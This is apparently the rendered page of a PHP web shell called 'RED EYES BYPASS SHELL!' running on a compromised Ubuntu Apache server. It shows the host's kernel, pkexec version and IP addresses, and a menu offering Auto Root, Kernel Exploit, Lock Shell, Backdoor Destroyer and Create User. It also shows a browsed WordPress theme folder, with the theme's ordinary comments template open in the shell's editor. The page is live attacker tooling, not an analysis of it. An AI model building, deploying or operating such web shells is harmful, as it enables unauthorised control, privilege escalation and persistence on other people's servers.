Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
medihealth /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
archive.php
2.67
KB
-rwxr-xr-x
breadcrumb.php
451
B
-rwxr-xr-x
category.php
2.67
KB
-rwxr-xr-x
class-tgm-plugin-activation.php
120.18
KB
-rwxr-xr-x
comments.php
1.97
KB
-rwxr-xr-x
content-aside.php
1.77
KB
-rwxr-xr-x
content-gallery.php
1.77
KB
-rwxr-xr-x
content.php
2.39
KB
-rwxr-xr-x
custom-comments.php
2.52
KB
-rwxr-xr-x
footer.php
2.5
KB
-rwxr-xr-x
front-page.php
1.21
KB
-rwxr-xr-x
functions.php
9.71
KB
-rwxr-xr-x
header.php
5.19
KB
-rwxr-xr-x
index.php
4.45
KB
-rwxr-xr-x
page.php
4.27
KB
-rwxr-xr-x
readme.txt
7.38
KB
-rwxr-xr-x
screenshot.png
1.03
MB
-rwxr-xr-x
searchform.php
417
B
-rwxr-xr-x
sidebar-footer.php
689
B
-rwxr-xr-x
sidebar-woocommerce.php
188
B
-rwxr-xr-x
single.php
7.24
KB
-rwxr-xr-x
style.css
126.86
KB
-rwxr-xr-x
tag.php
2.62
KB
-rwxr-xr-x
woocommerce.php
828
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-comments.php
<?php // My custom comments output html function medihealth_custom_comments( $comment, $args, $depth ) { // Get correct tag used for the comments if ( 'div' === $args['style'] ) { $tag = 'div'; $add_below = 'comment'; } else { $tag = 'li'; $add_below = 'div-comment'; } ?> <<?php echo esc_html($tag);?> <?php comment_class( empty( $args['has_children'] ) ? '' : 'parent' ); ?> id="comment-<?php comment_ID() ?>"> <?php // Switch between different comment types switch ( $comment->comment_type ) : case 'pingback' : case 'trackback' : ?> <div class="pingback-entry"><span class="pingback-heading"><?php esc_html_e( 'Pingback:', 'medihealth' ); ?></span> <?php comment_author_link(); ?></div> <?php break; default : ?> <div class="comment-details"> <div class="comment-author vcard bio"> <?php // Display avatar unless size is set to 0 if ( $args['avatar_size'] != 0 ) { $avatar_size = ! empty( $args['avatar_size'] ) ? $args['avatar_size'] : 70; // set default avatar size echo get_avatar( $comment, $avatar_size ); } ?> </div><!-- .comment-author --> <div class="comment-body"> <h3> <?php //author link printf(('%s'), get_comment_author_link()); ?> </h3> <div class="meta mb-2 comment-meta commentmetadata"> <?php comment_date('F j, Y');?> <?php esc_html_e('at','medihealth');?> <?php comment_time('g:i a'); ?> </div><!-- .comment-meta --> <div class="comment-text"><?php comment_text(); ?></div><!-- .comment-text --> <?php // Display comment moderation text if ( $comment->comment_approved == '0' ) { ?> <em class="comment-awaiting-moderation"><?php esc_html_e( 'Your comment is awaiting moderation.', 'medihealth' ); ?></em><br/><?php } ?> <div class="edit-btn"> <?php edit_comment_link( __( '<i class="far fa-edit"></i> Edit', 'medihealth' ), ' ', '' ); ?> </div> <div class="reply-btn"> <?php // Display comment reply link comment_reply_link(array_merge( $args, array( 'reply_text' => __('<i class="far fa-comment-dots"></i> Reply', 'medihealth'), 'add_below' => $add_below, 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ; if ( is_singular() ) wp_enqueue_script( "comment-reply" ); ?> </div> </div><!-- .comment-details --> <span> </span> </div> <?php break; endswitch; // End comment_type check. }
Close